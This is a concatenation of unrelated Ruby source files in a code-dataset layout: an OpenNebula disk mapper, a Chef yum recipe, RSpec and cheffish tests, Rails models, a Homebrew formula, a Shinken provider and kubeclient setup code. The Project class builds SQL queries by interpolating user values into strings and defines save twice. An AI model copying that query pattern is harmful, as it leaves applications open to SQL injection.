rc, _out, err = Command.execute(cmd, true)
return true if rc.zero?
OpenNebula.log_error("#{__method__}: #{err}")
nil
end
end
class DiskRawMapper < Mapper
# Maps the whole file using kpartx. The output should be something like:
# $ sudo kpartx -av /var/lib/one/datastores/100/0/disk.0
# add map loop3p1 (253:0): 0 204800 linear 7:3 2048
# add map loop3p2 (253:1): 0 524288 linear 7:3 206848
# add map loop3p3 (253:2): 0 1366016 linear 7:3 731136
# Fisrt line is matched to look for loop device 3, and return "/dev/loop3"
def do_map(one_vm, disk, directory)
dsrc = one_vm.disk_source(disk)
cmd = "#{COMMANDS[:kpartx]} -s -av #{dsrc}"
rc, out, err = Command.execute(cmd, true)
if rc != 0 || out.empty?
OpenNebula.log_error("#{__method__}: #{err}")
return
end
loopdev = out.lines[0].match(/.*add map loop(\d+)p\d+.*/)
return nil if !loopdev
"/dev/loop#{loopdev[1]}"
end
# Unmaps all devices and loops with kpartx using the source file
def do_unmap(device, one_vm, disk, directory)
dsrc = one_vm.disk_source(disk)
cmd = "#{COMMANDS[:kpartx]} -d #{dsrc}"
rc, _out, err = Command.execute(cmd, true)
return true if rc.zero?
OpenNebula.log_error("#{__method__}: #{err}")
nil
end
end
| 35.822917 | 80 | 0.503053 |
7a19e38c5da4296f83a03b3c4ff830a27876bc0d | 3,970 | #
# Author:: Sean OMeara (<[email protected]>)
# Recipe:: yum-mysql-community::mysql56-community
#
# Copyright:: 2014-2019, Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
yum_repository 'mysql56-community' do
description node['yum']['mysql56-community']['description'] unless node['yum']['mysql56-community']['description'].nil?
baseurl node['yum']['mysql56-community']['baseurl'] unless node['yum']['mysql56-community']['baseurl'].nil?
mirrorlist node['yum']['mysql56-community']['mirrorlist'] unless node['yum']['mysql56-community']['mirrorlist'].nil?
gpgcheck node['yum']['mysql56-community']['gpgcheck'] unless node['yum']['mysql56-community']['gpgcheck'].nil?
gpgkey node['yum']['mysql56-community']['gpgkey'] unless node['yum']['mysql56-community']['gpgkey'].nil?
enabled node['yum']['mysql56-community']['enabled'] unless node['yum']['mysql56-community']['enabled'].nil?
cost node['yum']['mysql56-community']['cost'] unless node['yum']['mysql56-community']['cost'].nil?
exclude node['yum']['mysql56-community']['exclude'] unless node['yum']['mysql56-community']['exclude'].nil?
enablegroups node['yum']['mysql56-community']['enablegroups'] unless node['yum']['mysql56-community']['enablegroups'].nil?
failovermethod node['yum']['mysql56-community']['failovermethod'] unless node['yum']['mysql56-community']['failovermethod'].nil?
http_caching node['yum']['mysql56-community']['http_caching'] unless node['yum']['mysql56-community']['http_caching'].nil?
include_config node['yum']['mysql56-community']['include_config'] unless node['yum']['mysql56-community']['include_config'].nil?
includepkgs node['yum']['mysql56-community']['includepkgs'] unless node['yum']['mysql56-community']['includepkgs'].nil?
keepalive node['yum']['mysql56-community']['keepalive'] unless node['yum']['mysql56-community']['keepalive'].nil?
max_retries node['yum']['mysql56-community']['max_retries'] unless node['yum']['mysql56-community']['max_retries'].nil?
metadata_expire node['yum']['mysql56-community']['metadata_expire'] unless node['yum']['mysql56-community']['metadata_expire'].nil?
mirror_expire node['yum']['mysql56-community']['mirror_expire'] unless node['yum']['mysql56-community']['mirror_expire'].nil?
priority node['yum']['mysql56-community']['priority'] unless node['yum']['mysql56-community']['priority'].nil?
proxy node['yum']['mysql56-community']['proxy'] unless node['yum']['mysql56-community']['proxy'].nil?
proxy_username node['yum']['mysql56-community']['proxy_username'] unless node['yum']['mysql56-community']['proxy_username'].nil?
proxy_password node['yum']['mysql56-community']['proxy_password'] unless node['yum']['mysql56-community']['proxy_password'].nil?
repositoryid node['yum']['mysql56-community']['repositoryid'] unless node['yum']['mysql56-community']['repositoryid'].nil?
sslcacert node['yum']['mysql56-community']['sslcacert'] unless node['yum']['mysql56-community']['sslcacert'].nil?
sslclientcert node['yum']['mysql56-community']['sslclientcert'] unless node['yum']['mysql56-community']['sslclientcert'].nil?
sslclientkey node['yum']['mysql56-community']['sslclientkey'] unless node['yum']['mysql56-community']['sslclientkey'].nil?
sslverify node['yum']['mysql56-community']['sslverify'] unless node['yum']['mysql56-community']['sslverify'].nil?
timeout node['yum']['mysql56-community']['timeout'] unless node['yum']['mysql56-community']['timeout'].nil?
action :create
end
| 81.020408 | 133 | 0.722166 |
6255e345ee43eb963e1777e6d0b83eca49523f4e | 7,807 | require 'spec_helper'
class TestSubject
include DataMagic
end
describe "DataMagic translations" do
context "when delivering data" do
let(:example) { TestSubject.new }
def set_field_value(value)
DataMagic.should_receive(:yml).twice.and_return({'key' => {'field' => value}})
end
it "should deliver the hash from the yaml" do
set_field_value 'value'
example.data_for('key').should have_field_value 'value'
end
it "should default to use a file named 'default.yml'" do
DataMagic::Config.yml_directory = 'test'
YAML.should_receive(:load_file).with("test/default.yml").and_return({})
DataMagic.should_receive(:yml).and_return(nil)
DataMagic.should_receive(:yml).and_return({'key' => {'field' => 'value'}})
example.data_for('key').should have_field_value 'value'
end
it "should clone the data returned so it can be resued" do
yaml = double('yaml')
yaml.stub(:merge).and_return(yaml)
DataMagic.should_receive(:yml).twice.and_return(yaml)
yaml.should_receive(:[]).and_return(yaml)
yaml.should_receive(:clone).and_return({'field' => 'value'})
example.data_for('key').should have_field_value 'value'
end
it "should merge the provided data with the yaml data" do
yaml = double('yaml')
DataMagic.should_receive(:yml).twice.and_return(yaml)
yaml.should_receive(:[]).and_return(yaml)
yaml.should_receive(:merge).and_return(yaml)
yaml.should_receive(:clone).and_return({'field' => 'value'})
example.data_for('key').should have_field_value 'value'
end
context "translating random names" do
it "should add a name" do
Faker::Name.should_receive(:name).and_return('Joseph')
set_field_value '~full_name'
example.data_for('key').should have_field_value 'Joseph'
end
it "should add first name" do
Faker::Name.should_receive(:first_name).and_return('Sam')
set_field_value '~first_name'
example.data_for('key').should have_field_value 'Sam'
end
it "should add last name" do
Faker::Name.should_receive(:last_name).and_return('Smith')
set_field_value '~last_name'
example.data_for('key').should have_field_value 'Smith'
end
end
context "translating random addresses" do
it "should add a street address" do
Faker::Address.should_receive(:street_address).and_return("123 Main")
set_field_value '~street_address'
example.data_for('key').should have_field_value '123 Main'
end
it "should add a city" do
Faker::Address.should_receive(:city).and_return('Cleveland')
set_field_value '~city'
example.data_for('key').should have_field_value 'Cleveland'
end
it "should add a state" do
Faker::Address.should_receive(:state).and_return('Ohio')
set_field_value '~state'
example.data_for('key').should have_field_value 'Ohio'
end
it "should add a state abbreviation" do
Faker::Address.should_receive(:state_abbr).and_return('OH')
set_field_value '~state_abbr'
example.data_for('key').should have_field_value 'OH'
end
it "should add a zip code" do
Faker::Address.should_receive(:zip_code).and_return('11111')
set_field_value '~zip_code'
example.data_for('key').should have_field_value '11111'
end
it "should add a country" do
Faker::Address.should_receive(:country).and_return("United States")
set_field_value '~country'
example.data_for('key').should have_field_value 'United States'
end
it "should add a secondary address" do
Faker::Address.should_receive(:secondary_address).and_return('2nd floor')
set_field_value '~secondary_address'
example.data_for('key').should have_field_value '2nd floor'
end
end
context "translating company names" do
it "should add a company name" do
Faker::Company.should_receive(:name).and_return('LeanDog')
set_field_value '~company_name'
example.data_for('key').should have_field_value 'LeanDog'
end
end
context "translating email address" do
it "should add an email address" do
Faker::Internet.should_receive(:email).and_return('[email protected]')
set_field_value '~email_address'
example.data_for('key').should have_field_value '[email protected]'
end
end
context "translating phone numbers" do
it "shold add a phone number" do
Faker::PhoneNumber.should_receive(:phone_number).and_return('555-555-5555')
set_field_value '~phone_number'
example.data_for('key').should have_field_value '555-555-5555'
end
end
context "translating random phrases" do
it "should add a catch phrase" do
Faker::Company.should_receive(:catch_phrase).and_return('Ruby is cool')
set_field_value '~catch_phrase'
example.data_for('key').should have_field_value 'Ruby is cool'
end
it "should add random words" do
Faker::Lorem.should_receive(:words).and_return(['random', 'words'])
set_field_value '~words'
example.data_for('key').should have_field_value 'random words'
end
it "should default to returning 3 words" do
set_field_value '~words'
example.data_for('key')['field'].split.size.should == 3
end
it "should allow you to specify the number of words" do
set_field_value '~words(4)'
example.data_for('key')['field'].split.size.should == 4
end
it "should add a random sentence" do
Faker::Lorem.should_receive(:sentence).and_return('a sentence')
set_field_value '~sentence'
example.data_for('key').should have_field_value 'a sentence'
end
it "should default to returning a minimum of 4 words" do
set_field_value '~sentence'
example.data_for('key')['field'].split.size.should >= 4
end
it "should allow you to specify a minimum word count" do
set_field_value '~sentence(20)'
example.data_for('key')['field'].split.size.should >= 20
end
it "should add sentences" do
Faker::Lorem.should_receive(:sentences).and_return(['this is sentences'])
set_field_value '~sentences'
example.data_for('key').should have_field_value 'this is sentences'
end
it "should default to returning a default of 3 sentences" do
set_field_value '~sentences'
example.data_for('key')['field'].split('.').size.should >= 3
end
it "should allow you to specify the number of sentences" do
set_field_value '~sentences(10)'
example.data_for('key')['field'].split('.').size.should >= 10
end
it "should add a paragraphs" do
Faker::Lorem.should_receive(:paragraphs).and_return(['this is a paragraph'])
set_field_value '~paragraphs'
example.data_for('key').should have_field_value 'this is a paragraph'
end
it "should return 3 paragraphs by default" do
set_field_value '~paragraphs'
example.data_for('key')['field'].split('\n\n').size.should == 3
end
it "should allow you to specify the number of paragraphs" do
set_field_value '~paragraphs(10)'
example.data_for('key')['field'].split('\n\n').size.should == 10
end
end
context "translating boolean values" do
it "should resolve true" do
set_field_value true
example.data_for('key').should have_field_value true
end
it "should resolve false" do
set_field_value false
example.data_for('key').should have_field_value false
end
end
end
end
| 35.648402 | 84 | 0.660049 |
79e199e046dbd897536bf2770424545187baf659 | 93 | class Page < ActiveRecord::Base
belongs_to :book
mount_uploader :image, PageUploader
end
| 18.6 | 37 | 0.784946 |
1897293e213f4a206e40353ce6fb9b2f7c7719e1 | 1,307 | class Project
attr_accessor :title
attr_reader :id
def initialize(attributes)
@title = attributes.fetch(:title)
@id = attributes.fetch(:id)
end
def save()
new_id = DB.exec("INSERT INTO projects (title) VALUEs ('#{@title}') RETURNING id; ")
@id = new_id.first().fetch("id").to_i
end
def ==(self_compare)
self.title == self_compare.title ? true : false
end
def self.all()
from_db_projects = DB.exec("SELECT * FROM projects;")
projects = []
from_db_projects.each do |project|
title = project.fetch("title")
id = project.fetch("id").to_i
projects.push(Project.new({:title => title, :id => id}))
end
projects
end
def save()
results = DB.exec("INSERT INTO projects (title) VALUES ('#{@title}')RETURNING id;").first
@id = results.fetch("id").to_i
end
def self.find(id)
project = DB.exec("SELECT * FROM projects WHERE id = #{id};").first
title = project.fetch("title")
Project.new({:title => title, :id => id})
end
def volunteers
Volunteer.find_by_project(self.id)
end
def update(attributes)
@title = attributes.fetch(:title)
DB.exec("UPDATE projects SET title = '#{@title}' WHERE id = #{@id};")
end
def delete()
DB.exec("DELETE FROM projects WHERE id = #{@id};")
end
end
| 24.203704 | 93 | 0.626626 |
0178b3689ffff1f893e39385036afe4407149417 | 1,004 | require "base64"
require "openssl"
require "time"
module Cassieq
class Authentication
attr_reader :key, :account
def self.generate_auth_headers(key, account, method, path)
new(key, account).auth_headers(method, path)
end
def initialize(key, account)
@key = key
@account = account
end
def auth_headers(method, path, request_time = formated_time_now)
auth_signature = signature_from_key(method, path, request_time)
{ "X-Cassieq-Request-Time" => request_time, "Authorization" => "Signed #{auth_signature}" }
end
def signature_from_key(method, path, request_time = formated_time_now)
key_bytes = Base64.urlsafe_decode64("#{key}==")
string_to_sign = [account, method.to_s.upcase, path, request_time].join("\n")
hmac = OpenSSL::HMAC.digest("sha256", key_bytes, string_to_sign)
Base64.urlsafe_encode64(hmac).gsub(/=+$/, "")
end
private
def formated_time_now
Time.now.utc.iso8601
end
end
end
| 26.421053 | 97 | 0.683267 |
bbdea2f54c94711bd24e2b90789f9629eb5230be | 1,870 | class Cpprestsdk < Formula
desc "C++ libraries for cloud-based client-server communication"
homepage "https://github.com/Microsoft/cpprestsdk"
url "https://github.com/Microsoft/cpprestsdk/archive/v2.10.6.tar.gz"
sha256 "5fecccc779b077f18acf0f7601b19b39c3da963498ed5b10bb2700dccfe66c5a"
head "https://github.com/Microsoft/cpprestsdk.git", :branch => "development"
bottle do
cellar :any
sha256 "70aa8095ca1b1ad92ca77122602d1fc999b523e9cb97f680a056328620c571fe" => :mojave
sha256 "9103ac596b82312771f1b1cd2b0a7dfc3cf0c2dfe3d51eb9642d9488a51cc3be" => :high_sierra
sha256 "9172c16e95e799434c9336b7c6d87893dd507e7b7682e9009c8bc59eaabf47f3" => :sierra
sha256 "8e5cf344c01e662cd85aa46ff662d87763897e948dc6de1d4a41f3e238cd49ae" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "boost"
depends_on "openssl"
def install
system "cmake", "-DBUILD_SAMPLES=OFF", "-DBUILD_TESTS=OFF", "Release", *std_cmake_args
system "make", "install"
end
test do
(testpath/"test.cc").write <<~EOS
#include <iostream>
#include <cpprest/http_client.h>
int main() {
web::http::client::http_client client(U("https://github.com/"));
std::cout << client.request(web::http::methods::GET).get().extract_string().get() << std::endl;
}
EOS
flags = ["-stdlib=libc++", "-std=c++11", "-I#{include}",
"-I#{Formula["boost"].include}",
"-I#{Formula["openssl"].include}", "-L#{lib}",
"-L#{Formula["openssl"].lib}", "-L#{Formula["boost"].lib}",
"-lssl", "-lcrypto", "-lboost_random", "-lboost_chrono",
"-lboost_thread-mt", "-lboost_system-mt", "-lboost_regex",
"-lboost_filesystem", "-lcpprest"] + ENV.cflags.to_s.split
system ENV.cxx, "-o", "test_cpprest", "test.cc", *flags
system "./test_cpprest"
end
end
| 41.555556 | 103 | 0.671123 |
ffd7d776f0b9fdf2b5a99c6b32a48ae6c457955d | 1,423 | action :create do
template "shinken/arbiter/#{template? ? "templates/": ""}hostgroups/#{new_resource.hostgroup_key}" do
path full_path
source "definitions/hostgroups/hostgroup.cfg.erb"
mode 00644
variables({
:hostgroup_key => new_resource.hostgroup_key,
:hostgroup_name => new_resource.hostgroup_name,
:hostgroup_alias => new_resource.hostgroup_alias,
:notes => new_resource.notes,
:notes_url => new_resource.notes_url,
:action_url => new_resource.action_url,
:realm => new_resource.realm,
:register => new_resource.register,
:use => new_resource.use
})
action :create
notifies :restart, "service[shinken-arbiter]", :delayed
end
node.run_state["shinken"]["arbiter"]["hostgroups"].push(path)
end
action :delete do
file full_path do
action :delete
end
end
def template?
not new_resource.register
end
def path
paths = ["hostgroups", "#{new_resource.hostgroup_key}.cfg"]
paths.unshift("templates") if not new_resource.register
::File.join(paths)
end
def full_path
::File.join("/etc/shinken/objects-chef", path)
end
def hostgroup_path
paths = ["hostgroups", new_resource.hostgroup_key]
paths.unshift("templates") if not new_resource.register
::File.join(paths)
end
def full_hostgroup_path
::File.join("/etc/shinken/objects-chef", hostgroup_path)
end
| 24.964912 | 103 | 0.683064 |
f76582700c4bf84ae3deb9cd2d1d5d2ac65380a4 | 491 | class Student < ApplicationRecord
belongs_to :parent
belongs_to :course
has_many :lessons
has_one :teacher, through: :course
# has_many :courses
# has_many :teachers, through: :courses
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable and :omniauthable
devise :database_authenticatable,
:recoverable, :rememberable, :trackable, :validatable
mount_uploader :image, StudentUploader
GENDER = ['Male', 'Female']
end
| 25.842105 | 62 | 0.741344 |
5d41d3990260885c8059e1116cf5d30e9d8c3a79 | 15,358 | require 'support/spec_support'
require 'cheffish/rspec/chef_run_support'
require 'support/key_support'
repo_path = Dir.mktmpdir('chef_repo')
describe Chef::Resource::PrivateKey do
extend Cheffish::RSpec::ChefRunSupport
before :each do
FileUtils.remove_entry_secure(repo_path)
Dir.mkdir(repo_path)
end
context 'with a recipe with a private_key' do
it 'the private_key is created in pem format' do
expect_recipe {
private_key "#{repo_path}/blah"
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
end
end
context 'with a private_key "blah" resource' do
before :each do
Dir.mkdir("#{repo_path}/other_keys")
Chef::Config.private_key_paths = [ repo_path, "#{repo_path}/other_keys" ]
end
it 'the private key is created in the private_key_write_path' do
expect_recipe {
private_key 'blah'
}.to have_updated "private_key[blah]", :create
expect(Chef::Config.private_key_write_path).to eq(repo_path)
expect(File.exist?("#{repo_path}/blah")).to be true
expect(File.exist?("#{repo_path}/other_keys/blah")).to be false
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
expect(OpenSSL::PKey.read(Cheffish.get_private_key('blah'))).to be_kind_of(OpenSSL::PKey::RSA)
end
context 'and the private key already exists somewhere not in the write path' do
before :each do
recipe { private_key "#{repo_path}/other_keys/blah" }.converge
end
it 'the private expect(key).to not update' do
expect_recipe {
private_key 'blah'
}.not_to have_updated "private_key[blah]", :create
expect(File.exist?("#{repo_path}/blah")).to be false
expect(File.exist?("#{repo_path}/other_keys/blah")).to be true
end
end
end
context 'with a private key' do
before :each do
Cheffish::BasicChefClient.converge_block do
private_key "#{repo_path}/blah"
end
end
context 'and a private_key that copies it in der format' do
it 'the private_key is copied in der format and is identical' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key_path "#{repo_path}/blah"
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah")
end
end
it 'a private_key that copies it from in-memory as a string succeeds' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key IO.read("#{repo_path}/blah")
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah")
end
it 'a private_key that copies it from in-memory as a key succeeds' do
key = OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key key
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah")
end
context 'and a public_key recipe' do
it 'the public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and a public key' do
before :each do
Cheffish::BasicChefClient.converge_block do
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
end
end
end
context 'and public_key resource based off the public key file' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key_path "#{repo_path}/blah.pub"
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and another public_key based off the first public_key in-memory in a string' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key IO.read("#{repo_path}/blah.pub")
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
it 'and another public_key based off the first public_key in-memory in a key, the second public_key is created' do
key, format = Cheffish::KeyFormatter.decode(IO.read("#{repo_path}/blah.pub"))
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key key
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
context 'and another public_key in :pem format based off the first public_key' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key_path "#{repo_path}/blah.pub"
format :pem
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and another public_key in :der format based off the first public_key' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key_path "#{repo_path}/blah.pub"
format :pem
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
end
context 'and a public_key resource in pem format' do
it 'the public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
format :pem
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('-----BEGIN')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and a public_key resource in der format' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
format :der
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).not_to start_with('-----BEGIN')
expect(IO.read("#{repo_path}/blah.pub")).not_to start_with('ssh-rsa')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
end
context 'with a recipe with a private_key in der format' do
it 'the private_key is created' do
expect_recipe {
private_key "#{repo_path}/blah" do
format :der
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).not_to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
end
end
context 'with a private key in der format' do
before :each do
Cheffish::BasicChefClient.converge_block do
private_key "#{repo_path}/blah" do
format :der
end
end
end
context 'and a public_key' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
end
context 'with a recipe with a private_key with a pass_phrase' do
it 'the private_key is created' do
expect_recipe {
private_key "#{repo_path}/blah" do
pass_phrase 'hello'
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"), 'hello')).to be_kind_of(OpenSSL::PKey::RSA)
end
end
context 'with a private key with a pass phrase' do
before :each do
Cheffish::BasicChefClient.converge_block do
private_key "#{repo_path}/blah" do
pass_phrase 'hello'
end
end
end
context 'and a private_key that copies it in der format' do
it 'the private_key is copied in der format and is identical' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key_path "#{repo_path}/blah"
source_key_pass_phrase 'hello'
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah", 'hello')
end
end
context 'and a private_key resource pointing at it without a pass_phrase' do
it 'the run fails with an exception' do
expect {
converge {
private_key "#{repo_path}/blah"
}
}.to raise_error /missing pass phrase?/
end
end
context 'and a private_key resource with no pass phrase and regenerate_if_different' do
it 'the private_key is regenerated' do
expect_recipe {
private_key "#{repo_path}/blah" do
regenerate_if_different true
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
end
end
it 'a private_key resource that copies it from in-memory as a string succeeds' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key IO.read("#{repo_path}/blah")
source_key_pass_phrase 'hello'
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah", 'hello')
end
context 'and a public_key' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
source_key_pass_phrase 'hello'
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah", 'hello'
end
end
context 'and a public_key derived from the private key in an in-memory string' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key IO.read("#{repo_path}/blah")
source_key_pass_phrase 'hello'
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah", 'hello'
end
end
end
context 'with a recipe with a private_key and public_key_path' do
it 'the private_key and public_key are created' do
expect_recipe {
private_key "#{repo_path}/blah" do
public_key_path "#{repo_path}/blah.pub"
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for("#{repo_path}/blah")
end
end
context 'with a recipe with a private_key and public_key_path and public_key_format' do
it 'the private_key and public_key are created' do
expect_recipe {
private_key "#{repo_path}/blah" do
public_key_path "#{repo_path}/blah.pub.der"
public_key_format :der
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
expect(IO.read("#{repo_path}/blah.pub.der")).not_to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub.der").to be_public_key_for("#{repo_path}/blah")
end
end
context 'with a recipe with a private_key with path :none' do
it 'the private_key is created' do
got_private_key = nil
expect_recipe {
private_key 'in_memory' do
path :none
after { |resource, private_key| got_private_key = private_key }
end
}.to have_updated "private_key[in_memory]", :create
expect(got_private_key).to be_kind_of(OpenSSL::PKey::RSA)
end
end
end
| 38.782828 | 120 | 0.627425 |
2632fdc375a2a6cc3a7f2dd7e4c809556b9d91b3 | 19,598 | require 'json'
require 'rest-client'
module Kubeclient
# Common methods
# this is mixed in by other gems
module ClientMixin
ENTITY_METHODS = %w[get watch delete create update patch].freeze
DEFAULT_SSL_OPTIONS = {
client_cert: nil,
client_key: nil,
ca_file: nil,
cert_store: nil,
verify_ssl: OpenSSL::SSL::VERIFY_PEER
}.freeze
DEFAULT_AUTH_OPTIONS = {
username: nil,
password: nil,
bearer_token: nil,
bearer_token_file: nil
}.freeze
DEFAULT_SOCKET_OPTIONS = {
socket_class: nil,
ssl_socket_class: nil
}.freeze
DEFAULT_TIMEOUTS = {
# These do NOT affect watch, watching never times out.
open: Net::HTTP.new('127.0.0.1').open_timeout, # depends on ruby version
read: Net::HTTP.new('127.0.0.1').read_timeout
}.freeze
DEFAULT_HTTP_PROXY_URI = nil
SEARCH_ARGUMENTS = {
'labelSelector' => :label_selector,
'fieldSelector' => :field_selector,
'limit' => :limit,
'continue' => :continue
}.freeze
WATCH_ARGUMENTS = {
'labelSelector' => :label_selector,
'fieldSelector' => :field_selector,
'resourceVersion' => :resource_version
}.freeze
attr_reader :api_endpoint
attr_reader :ssl_options
attr_reader :auth_options
attr_reader :http_proxy_uri
attr_reader :headers
attr_reader :discovered
def initialize_client(
uri,
path,
version,
ssl_options: DEFAULT_SSL_OPTIONS,
auth_options: DEFAULT_AUTH_OPTIONS,
socket_options: DEFAULT_SOCKET_OPTIONS,
timeouts: DEFAULT_TIMEOUTS,
http_proxy_uri: DEFAULT_HTTP_PROXY_URI,
as: :ros
)
validate_auth_options(auth_options)
handle_uri(uri, path)
@entities = {}
@discovered = false
@api_version = version
@headers = {}
@ssl_options = ssl_options
@auth_options = auth_options
@socket_options = socket_options
# Allow passing partial timeouts hash, without unspecified
# @timeouts[:foo] == nil resulting in infinite timeout.
@timeouts = DEFAULT_TIMEOUTS.merge(timeouts)
@http_proxy_uri = http_proxy_uri ? http_proxy_uri.to_s : nil
@as = as
if auth_options[:bearer_token]
bearer_token(@auth_options[:bearer_token])
elsif auth_options[:bearer_token_file]
validate_bearer_token_file
bearer_token(File.read(@auth_options[:bearer_token_file]))
end
end
def method_missing(method_sym, *args, &block)
if discovery_needed?(method_sym)
discover
send(method_sym, *args, &block)
else
super
end
end
